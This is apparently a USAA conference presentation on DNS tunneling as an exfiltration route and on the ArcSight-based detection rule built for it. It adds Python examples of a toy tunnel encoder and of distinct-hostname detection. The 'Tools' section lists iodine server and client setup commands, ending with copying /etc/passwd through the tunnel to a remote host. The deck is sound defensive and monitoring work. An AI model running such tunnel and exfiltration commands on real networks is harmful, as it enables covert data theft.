DNS data exfiltration - Micro Focus Community
© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
DNS data exfiltration Pete Babcock - USAA
What is DNS Tunneling?
Problem Statement
What happened?
The CTOC discovered that DNS tunneling could be used to exfiltrate data from USAA. During last year's penetration test, an external pen tester hired by USAA confirmed that it could.
What is DNS Tunneling?
USAA CONFIDENTIAL
DNS
Normal DNS Traffic (Simplified): a workstation asks the internal DNS server for www.google.com; the query passes the firewall to an external DNS server, which answers 74.125.227.210. Security monitoring watches the internal DNS server and the firewall and sees nothing unusual.

DNS
After hacking the Member's USAA Account... DNS Tunneling (Greatly Simplified): the compromised workstation asks for yourcre.evilbono.com, then ditcard.evilbono.com, and so on. Because evilbono.com is delegated to the attacker, each query is forwarded through the same internal DNS server and firewall to the attacker's "DNS Server", which simply concatenates the host labels: yourcre + ditcard = yourcreditcard. The data leaves the company inside the query names themselves, and the monitoring sees only DNS.
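To show what the diagram above means in practice, here is an added Python example (not from the deck, and not iodine's wire format): a toy encoder splits a payload into base32 labels, one per query name under the attacker's domain, and a toy "DNS server" side reassembles the payload from the query names in any order. The domain tunnel.hajda.net is the one the deck uses for its own test; the filler payload, the 4-hex-digit sequence prefix and the 59-character data length per label are assumptions.

```python
"""Toy DNS-tunnel encoder/decoder: data leaves inside query names.

Added example, not iodine's protocol.  Assumptions: one data label per
query name; base32 so the payload survives DNS case folding and the
letters/digits/hyphen character set; a 4-hex-digit sequence prefix so the
receiver can reorder retried or reordered queries.
"""
import base64


def encode_to_queries(payload, domain, data_len=59):
    """Turn `payload` into a list of unique DNS query names under `domain`.

    Each name carries one label: 4 hex digits of sequence number followed by
    up to `data_len` base32 characters, so a label never exceeds the 63-octet
    DNS label limit (4 + 59 = 63).
    """
    text = base64.b32encode(payload).decode("ascii").rstrip("=").lower()
    pieces = [text[i:i + data_len] for i in range(0, len(text), data_len)]
    names = []
    for seq, piece in enumerate(pieces):
        name = "%04x%s.%s" % (seq, piece, domain)
        if len(name) > 253:  # full-name limit in DNS
            raise ValueError("query name too long; shorten domain or data_len")
        names.append(name)
    return names


def decode_from_queries(names, domain):
    """Reassemble the payload from the query names the 'DNS server' saw.

    Order does not matter: pieces are indexed by sequence number, and a
    retransmitted query simply overwrites its slot with identical data.
    """
    suffix = "." + domain
    pieces = {}
    for name in names:
        if not name.endswith(suffix):
            continue  # unrelated query for some other name, ignore it
        label = name[:-len(suffix)]
        pieces[int(label[:4], 16)] = label[4:]
    text = "".join(pieces[i] for i in sorted(pieces)).upper()
    # restore the base32 padding stripped by the encoder
    return base64.b32decode(text + "=" * (-len(text) % 8))


# Constructed payload (not from the deck): about 900 bytes of filler text.
PAYLOAD = b"The quick brown fox jumps over the lazy dog. " * 20


def demo(domain="tunnel.hajda.net"):
    """Round-trip PAYLOAD and report what a resolver in the path would observe."""
    names = encode_to_queries(PAYLOAD, domain)
    # simulate out-of-order arrival at the attacker's server
    recovered = decode_from_queries(list(reversed(names)), domain)
    return {
        "queries": len(names),
        "max_label": max(len(n[:-len(domain) - 1]) for n in names),
        "roundtrip_ok": recovered == PAYLOAD,
        "first_query": names[0],
    }


if __name__ == "__main__":
    print(demo())
```

A 900-byte payload becomes 25 unique query names, each carrying a 63-character label under one domain, which is exactly the "many distinct host names for the same source and domain" pattern the USAA rule later keys on. Real tunnelling tools add encryption, compression and a downstream channel carried in the DNS responses; this toy only shows the upstream direction.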
DNS Tunneling
Data Loss Prevention

How hard is it to detect and prevent?
There are no known commercial products that detect this easily. Very few companies have home-grown solutions. Detection is prone to false positives. There are no known prevention capabilities (at least none that don't break your business...).
Tools
DNS Tunneling Testing

What tools can be used to facilitate DNS Tunneling?
There are several, but for this demonstration we used Iodine, which is free.

What are the steps to perform DNS tunneling?
1. Start the Virtual Machine that you plan to run the Iodine Server on. a) We used Ubuntu Linux, but there are many options available.
2. Configure external DNS records for the domain you own: a) Delegate a subdomain NS record to the host running the Iodine Server.
3. Port forward UDP 53 from the external IP to the internal VMware host running the Iodine Server.
4. Disable any application currently bound to UDP 53 (like BIND): sudo service bind9 stop
5. Start the Iodine Server on the virtual machine: sudo iodined -f -c -P secretUSAA1 192.168.99.1 tunnel.hajda.net
6. Start the Iodine client on an internal host: sudo iodine -f -P secretUSAA1 tunnel.hajda.net
7. The remote server's tunnel IP is now 192.168.99.1; copy files through SCP: scp /etc/passwd <user>@192.168.99.1:/tmp

You just sent data through a DNS Tunnel!
And your company probably wouldn't detect it...
DNS Query Logging and Transmission
USAA Solution

How does one monitor for this type of traffic?
Easy. Just turn on query logging for all DNS traffic leaving your company.
Now quickly turn it back off, because you probably just killed your DNS solution...
Most DNS solutions were not designed to log this volume of events long term.

So, how did USAA successfully log all DNS queries leaving the company then?
An alternative solution utilizing the load balancers had to be created and tested. The load balancers are strategically placed in front of the DNS solution. Rules on the load balancers create a load-balancer log event for each DNS query. These events are then streamed via syslog to the ArcSight Connector servers.
ArcSight Connector – Volume Issues
USAA Solution

Doesn't this place a lot of load then on the ArcSight Connector?
Yes.

How do you scale the ArcSight Connector to handle the load?
Again with the load balancers: multiple ArcSight Connectors are created for DNS syslog. These connectors are placed behind load balancers, which expose a virtual IP address (VIP) for the connector pool. The DNS syslog events are distributed amongst the connectors via the load-balanced VIP.
ArcSight Connector - Parsing
USAA Solution

How do you parse the Load Balancer log events?
USAA's load balancers can emit the events in the Common Event Format (CEF). The default Syslog Daemon connector parses these out of the box.
However, USAA wanted to extract the domain portion of the destinationHostName field into the destinationDnsDomain field, which necessitated a Flex Connector.
This step could be avoided by doing the parsing in the rule using local variables. USAA chose to perform it at the connector to save CPU on the Manager.
ESM – Volume Issues
USAA Solution

So this was the end of the event acquisition issues?
No. The volume of DNS query events quickly began consuming all of the ArcSight ESM ARC_EVENT_DATA free space...

What steps were taken next?
ArcSight ESM Connector filters were created.

What was filtered?
First, known high-volume USAA devices that generate false positives were filtered:
  ArcSight Connectors
  Mail Exchangers
  Proxy Servers
Second, high-volume DNS domains that would be unlikely to be used for DNS tunneling were filtered.
ESM – Rule Filters
USAA Solution

DNS events might be useful for other rules. Should you filter all false-positive domains out at the Connector Filter level?
That is a judgement call. There are some domains that USAA chose to filter out at the Rule Filter level instead of the Connector Filter level, so their events remain available to other rules.
ESM – Rule
USAA Solution

Now that all of the prep work is done, what does the ESM Rule look like?
At the end of the day, the ESM rule is a variation of the basic "N events matching X conditions within M amount of time" rule.
We will look at the rule one tab at a time...
ESM – Rule (Conditions tab)
USAA Solution

Give me DNS query events: Base and Aggregated events, not Correlation or Action events.
Filter out ArcSight Connector DNS queries.
Filter out Proxy Server DNS queries.
Filter out Mail Exchanger DNS queries.
Filter out specific destination domains (Rules Filter: Specific Destination Domains): photobucket.com, images at har.com
Filter out sources that are VPN user machines.

ESM – Rule (Aggregation tab)
USAA Solution

N = 40 matches within M = 5 minutes,
where the host portion of the DNS query takes at least 40 distinct values
while the Source Address and Destination DNS Domain remain the same.

ESM – Rule (Actions tab)
USAA Solution

Suppress exact duplicates for a set amount of time.
Include an external USAA Use Case link in the rule-fire meta event.
Create a "Must Respond" case for the analyst to work.
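To make the Flex Connector parsing step and the rule above concrete, here is an added worked example in Python (not USAA's or ArcSight's code): it parses constructed load-balancer-style CEF lines, derives the destination DNS domain from the host name as the Flex Connector step does, applies the source and domain filters, and fires when 40 distinct host names for the same source and domain occur within five minutes, suppressing repeat fires for the same pair. The extension keys src and dhost, the ISO-8601 timestamp in rt, the vendor string, the 10.122.x.x addresses, the 60-second and 200-event volumes and the contents of the filter sets are all assumptions.

```python
"""DNS-tunnel detection in the spirit of the USAA ESM rule (added example).

Assumptions: each load-balancer DNS event arrives as a CEF line whose
extension carries src= (querying host), dhost= (queried name) and rt=
(timestamp, ISO-8601 here for readability; real events use epoch ms).
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# --- Constructed sample events (not from the deck) --------------------------
T0 = datetime(2013, 9, 16, 10, 0, 0)


def cef_line(ts, src, fqdn):
    """Build one constructed load-balancer-style CEF event."""
    return ("CEF:0|ExampleVendor|LoadBalancer|1.0|dns-query|DNS query|3|"
            "rt=%s src=%s dhost=%s proto=UDP dpt=53" % (ts.isoformat(), src, fqdn))


def build_sample_log():
    lines = []
    # (1) tunnel-like: one workstation, 45 distinct labels under one domain in 90 s
    for i in range(45):
        lines.append(cef_line(T0 + timedelta(seconds=2 * i), "10.122.1.50",
                              "p%03xa.tunnel.hajda.net" % i))
    # (2) mail exchanger: many distinct names, but the source is a known noisy host
    for i in range(60):
        lines.append(cef_line(T0 + timedelta(seconds=i), "10.122.0.25",
                              "mx%d.example.org" % i))
    # (3) CDN-style domain with many hosts, excluded by the rule's domain filter
    for i in range(60):
        lines.append(cef_line(T0 + timedelta(seconds=i), "10.122.1.60",
                              "i%d.photobucket.com" % i))
    # (4) high volume but a single name: many events, one distinct host
    for i in range(200):
        lines.append(cef_line(T0 + timedelta(seconds=i), "10.122.1.70",
                              "www.google.com"))
    return lines


# --- Parsing (the Flex Connector step) ---------------------------------------
_EXT_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_cef(line):
    """Return the CEF extension fields as a dict.

    The seven pipe-separated header fields are skipped; extension values in
    these events contain no spaces, so a key=value scan is sufficient.
    """
    ext = line.split("|", 7)[7]
    return dict(_EXT_RE.findall(ext))


def registered_domain(fqdn):
    """destinationDnsDomain from destinationHostName: the last two labels.

    Caveat: names under multi-label public suffixes (e.g. bbc.co.uk) need the
    Public Suffix List; this naive version would return 'co.uk' for them.
    """
    labels = fqdn.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


# --- The rule: N distinct hosts per (source, domain) within M minutes -------
FILTERED_SOURCES = {"10.122.0.25"}       # connectors, MX, proxies (constructed)
FILTERED_DOMAINS = {"photobucket.com"}   # rule-level domain filter (constructed)


def detect_dns_tunneling(lines, n=40, window=timedelta(minutes=5),
                         suppress=timedelta(hours=1)):
    """Fire once per (src, domain) when >= n distinct query names are seen
    inside a sliding `window`; repeat fires for the same pair are suppressed
    for `suppress`, mirroring the rule's duplicate suppression."""
    events = []
    for line in lines:
        f = parse_cef(line)
        src, host = f["src"], f["dhost"].lower()
        if src in FILTERED_SOURCES:
            continue
        domain = registered_domain(host)
        if domain in FILTERED_DOMAINS:
            continue
        events.append((datetime.fromisoformat(f["rt"]), src, domain, host))
    events.sort()

    recent = defaultdict(deque)   # (src, domain) -> deque of (ts, host)
    last_fire = {}
    alerts = []
    for ts, src, domain, host in events:
        key = (src, domain)
        q = recent[key]
        q.append((ts, host))
        while ts - q[0][0] > window:   # drop events older than the window
            q.popleft()
        distinct = {h for _, h in q}
        if len(distinct) < n:
            continue
        if key in last_fire and ts - last_fire[key] < suppress:
            continue
        last_fire[key] = ts
        alerts.append({"source": src, "domain": domain,
                       "distinct_hosts": len(distinct), "at": ts})
    return alerts


if __name__ == "__main__":
    for alert in detect_dns_tunneling(build_sample_log()):
        print(alert)
```

Run over the 365 constructed events, only the workstation querying 45 different names under hajda.net fires; the mail exchanger is dropped by the source filter, the photobucket.com traffic by the domain filter, and the host hammering www.google.com never exceeds one distinct name, which is why the rule counts distinct host portions rather than raw query volume.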
ESM – Cases
USAA Solution

What do the ESM Cases look like for these rule fires?
[Screenshots of the ESM cases (Data Loss Prevention) follow on the next three slides.]
Note: The 10.122.x.x IP address used for these examples is a test lab set up for this demonstration and does not reflect USAA's production environment.
DNS Tunneling
Results

Is this solution in Production?
Yes.

Have we detected any true, malicious DNS Tunneling yet?
No. Apart from our own tests, no DNS tunneling has been seen. USAA was hoping not to find any, and was grateful to be proven correct.

Did this satisfy the requirements to monitor for this activity?
Yes, USAA has satisfied the auditors and our own management.
More importantly, we have increased USAA's security around Data Loss Prevention!
Questions?
Q&A